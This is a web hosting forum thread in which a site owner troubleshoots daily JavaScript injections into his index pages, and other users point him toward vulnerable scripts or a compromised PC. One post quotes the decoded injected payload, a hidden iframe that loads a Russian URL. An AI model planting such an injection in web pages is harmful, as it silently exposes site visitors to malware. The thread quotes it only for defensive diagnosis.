I've had a javascript virus added to all my index pages for like 4-5 days straight. It occurs around the same time every day. I just noticed this wysiwygpro_edit file and another one named something similar that I never put in there. After reading this http://forum.joomla.org/viewtopic.php?f=432&t=323240&view=previous I am convinced this is how the hackers are doing it to me. Deleted it of course.

Just thought I'd post this in case it is happening to anybody else. The file in question would probably be located right in the main folder of the site that is getting hacked.

Now to pray this doesn't happen again tomorrow.

Probably not. If you've ever hit the "HTML Editor" button in the File Manager, those files would appear on your account.

The hacking is probably coming from elsewhere. Make sure you've got the latest version of Joomla (1.5.10, I believe), and that you're not using any addons or plugins that might be providing an entry path for the bad guys.

I actually have no idea what Joomia is, I found that joomia forum by looking up the name of the suspicious file I found on yahoo.

Even if it were the case that it went on there automatically, I think that wyswig file would be a great way for a hacker to install the javascript virus on all my index pages.

Say have you ever heard of someone getting a virus javascript posted underneath their html code on all index pages about the same time every day before? Doesn't matter if it's php or html.

The key question is, what scripts are you running on your site? Not Joomla, OK, but how about Wordpress, or Drupal, or any other server-side process?

Nope none of that. Used to run Drupal a long time ago, but it's been deleted. The wysiwig thing must have popped in because my wife said she used the file manager edit tool. Like you said it pops automatically in there when you use it.

Thing is I did some more research and there are security holes in wysiwig editors so hopefully getting rid of those two WYSIWYG files kill keep the hacker off my site. I hope.

Nothing else on my site allows for someone to input data other than my message board.

Nothing else on my site allows for someone to input data other than my message board.
... which is? Sounds like the leading candidate, to me!

I know you've fixed on the wysiwyg editor file as a hacking path, but think about it: if the cPanel HTML Editor were a pathway for hackers, there would be thousands upon thousands of people (and not just BH customers) getting hacked. And that's not happening.

Well I guess we'll see tomorrow between 1-1:30. That's when the hacker always attacks.

Main reason though I'm not leaning toward the message board is because it's not a very widely known script, and I've used it for years on several sites with no problems.

It just seems to me a program that actually edits any page you want on a site would be the logical choice of a hacker. But I guess we'll see. I'll try to come back tomorrow after 2 or so and tell you what happened.

Well maybe that sorry sob is reading the board because he didn't wait till tomorrow. He did it to me again. The virus javascript is back.

Back to the drawing board I guess.

It just seems to me a program that actually edits any page you want on a site would be the logical choice of a hacker.

Not if it is protected so that it can only be used by the site owner.

ALL web attacks come either through vulnerabilities in scripts running on your site or if it is through something that only you are supposed to have access to then they get access by compromising your own computer with a keylogger so as to capture all your passwords.

I found a binary translator, tranlated the crazy javascript the hacker has added, and it says

window.status='Done';document.write('<iframe name=4749f56 src=\'http://zctk.ru/liwe/?t=1?'+Math.round(Math.random()*155800)+'4646f11\' width=475 height=328 style=\'display: none\'></iframe>')

Now what can I do with this info to stop the hacker?

All that tells you is that it's some sort of Russian spam link. This doesn't give you any tools to stop the hacker.

All you can do to stop the hacker is to keep him from getting in. That means plugging the security hole in the script you're running and/or clear the infection from your own PC (less likely as the source, but if there's a keylogger running on your PC, for example, the hacker will know when you change your passwords).

Well I changed my password last night over the phone, and did not use it on the computer. He still got in.

Today I've deleted all my scripts. What if he still gets in?

Today I've deleted all my scripts. What if he still gets in?
Call the Vatican to report a miracle. There are only two pathways to infection: a script with a security hole, or a compromised PC. If the site consists only of static HTML pages, and the PC isn't infected, there's no way for a hacker to get in.

For a site to get hacked, there has to be some sort of server-side processing going on (which doesn't happen with static HTML). Just make sure the hacker hasn't left himself some sort of backdoor, a script on your account that you're not aware of - you'll need to do some digging around.

Im a baptist, will a local preacher do, because they did it again.

Im a baptist, will a local preacher do, because they did it again.

I doubt it is a miracle. If you really have made sure there are no scripts at all running on your site then your own computer must be compromised and when you changed your password a copy of the new password was sent directly from your computer the the person causing you all the problems.

No, I called and had it changed and kept it from the computer.

But there are other scripts on other sites on the same account, but those sites were never touched that I saw.

Only thing left to do is move to another one of my accounts.

I do think eventually I will have all my sites completely static html pages if at all possible.

But there are other scripts on other sites on the same account

So the security hole is on one of those scripts then. Just the person is being slightly clever by not trashing the site the script is running on but instead updating other sites on the same account. By doing that they are trying to make it harder for you to figure out which script it is that has the security hole.